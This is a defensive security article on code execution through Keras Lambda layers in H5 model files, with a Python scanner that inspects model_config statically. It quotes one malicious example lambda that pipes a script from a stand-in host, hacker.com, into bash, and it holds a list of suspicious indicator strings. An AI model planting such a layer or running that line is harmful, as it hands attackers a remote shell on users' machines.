Keras Lambda Injection: Code Execution via Model Architecture
The Flexibility of Keras
Keras (and TensorFlow) allows developers to define custom layers using the Lambda layer. This is a powerful feature that lets you write arbitrary Python logic inside your neural network architecture.
For example:
model.add(Lambda(lambda x: x ** 2))
When you save this model to an H5 file (model.h5 or model.keras), Keras serializes this lambda function.
The Vulnerability
The problem arises because Keras serializes the lambda function's bytecode (or its source code) into the model configuration. When a user later loads the model with load_model(), Keras deserializes and compiles that code as part of reconstructing the layer.
An attacker can craft a malicious H5 file where the Lambda layer contains a payload:
# Malicious Lambda
Lambda(lambda x: os.system("curl hacker.com/rev_shell | bash") or x)
If a victim loads this model, the system command executes during the graph construction phase—often before model.predict() is ever called.
Why It's Dangerous
Pickle is widely known to be unsafe, but many developers treat H5 files (HDF5, the Hierarchical Data Format) as "safe" structured data. They assume such a file contains nothing but weight matrices.
This vector is particularly dangerous for platforms that allow users to upload their own models for evaluation or fine-tuning.
Detecting Lambda Injections
Defense requires inspecting the model's configuration JSON without loading the model into the TensorFlow engine.
Veritensor parses the H5 structure and extracts the model_config attribute. It then scans the JSON architecture for:
- Layers with class_name: "Lambda".
- Suspicious code strings inside the lambda configuration.
veritensor scan dangerous_model.h5
# Output: CRITICAL: Keras Lambda layer detected (RCE Risk)
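The approach described above, extracting model_config from the H5 file and scanning the JSON for Lambda layers without ever importing TensorFlow or Keras, can be reproduced in a few dozen lines. The following is an added example written for this article; it is not Veritensor's code. It assumes the Keras 2 serialization layout for Lambda layers (config["function"] holding a list whose first element is base64-encoded marshal output of the function's code object) and the Keras 3 layout (a nested "__lambda__" dict with a "code" field); the function names scan_model_config, scan_h5_file and the constructed sample config are this example's own. The suspicious-indicator check deliberately scans the decoded bytes rather than unmarshalling them, so no code object is ever built from the untrusted file.

```python
"""Static scan of a Keras model_config JSON for Lambda layers (added example)."""
import base64
import json
import marshal
import os

# Byte patterns to look for inside the marshalled code object. marshal stores
# co_names and string constants verbatim, so a name such as "system" appears
# literally in the stream and can be found without unmarshalling anything.
SUSPICIOUS_INDICATORS = (
    b"system", b"subprocess", b"popen", b"exec", b"eval",
    b"__import__", b"socket", b"urllib", b"requests",
)


def iter_layers(node):
    """Yield every dict that carries a class_name, descending into nested
    configs (Functional models, wrapped layers, etc.)."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node
        for value in node.values():
            yield from iter_layers(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_layers(item)


def extract_code_blobs(layer):
    """Return decoded code blobs stored in a Lambda layer's config.
    Keras 2: config["function"] == [base64_code, defaults, closure] (assumption).
    Keras 3: config["function"] == {"class_name": "__lambda__", "config": {"code": ...}} (assumption)."""
    fn = layer.get("config", {}).get("function")
    candidates = []
    if isinstance(fn, list) and fn and isinstance(fn[0], str):
        candidates.append(fn[0])
    elif isinstance(fn, dict):
        code = fn.get("config", {}).get("code")
        if isinstance(code, str):
            candidates.append(code)
    blobs = []
    for text in candidates:
        try:
            blobs.append(base64.b64decode(text, validate=True))
        except ValueError:
            # Not base64: a named function reference rather than serialized code.
            pass
    return blobs


def scan_model_config(config_json):
    """Scan a model_config JSON string. Every Lambda layer is a CRITICAL finding
    (it can run arbitrary Python on load); indicators found in its bytecode are
    reported as extra context for the reviewer."""
    findings = []
    for layer in iter_layers(json.loads(config_json)):
        if layer.get("class_name") != "Lambda":
            continue
        name = layer.get("config", {}).get("name", "<unnamed>")
        indicators = set()
        for blob in extract_code_blobs(layer):
            for marker in SUSPICIOUS_INDICATORS:
                if marker in blob:
                    indicators.add(marker.decode())
        findings.append({"layer": name, "severity": "CRITICAL",
                         "indicators": sorted(indicators)})
    return findings


def scan_h5_file(path):
    """Read the root attribute model_config with h5py and scan it. TensorFlow
    and Keras are never imported, so no layer is built and no code runs."""
    import h5py  # imported lazily; the JSON scanner above needs no h5py
    with h5py.File(path, "r") as f:
        raw = f.attrs["model_config"]
    if isinstance(raw, bytes):
        raw = raw.decode("utf-8")
    return scan_model_config(raw)


def _serialize_lambda(fn):
    """Mimic the Keras 2 Lambda serialization format (assumption, see lead-in)."""
    return [base64.b64encode(marshal.dumps(fn.__code__)).decode("ascii"), None, None]


# Constructed sample config: a Dense layer, the article's benign x ** 2 Lambda,
# and a Lambda whose bytecode references os.system. Defining a lambda does not
# execute it; only its bytecode is serialized here.
CONSTRUCTED_MODEL_CONFIG = json.dumps({
    "class_name": "Sequential",
    "config": {"name": "sequential", "layers": [
        {"class_name": "Dense", "config": {"name": "dense", "units": 4}},
        {"class_name": "Lambda", "config": {
            "name": "square", "function_type": "lambda",
            "function": _serialize_lambda(lambda x: x ** 2)}},
        {"class_name": "Lambda", "config": {
            "name": "payload", "function_type": "lambda",
            "function": _serialize_lambda(
                lambda x: os.system("echo constructed-demo") or x)}},
    ]},
})

if __name__ == "__main__":
    for finding in scan_model_config(CONSTRUCTED_MODEL_CONFIG):
        print(f"{finding['severity']}: Keras Lambda layer {finding['layer']!r} "
              f"detected (RCE Risk); indicators: {finding['indicators']}")
```

Run against a real file with scan_h5_file("model.h5"). Note that the severity is driven by the presence of the Lambda layer itself, matching the article's advice: the indicator list only helps triage, and an empty list does not make a Lambda layer from an unknown source safe.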
If you see a Lambda layer in a public model you didn't create, treat it with extreme suspicion.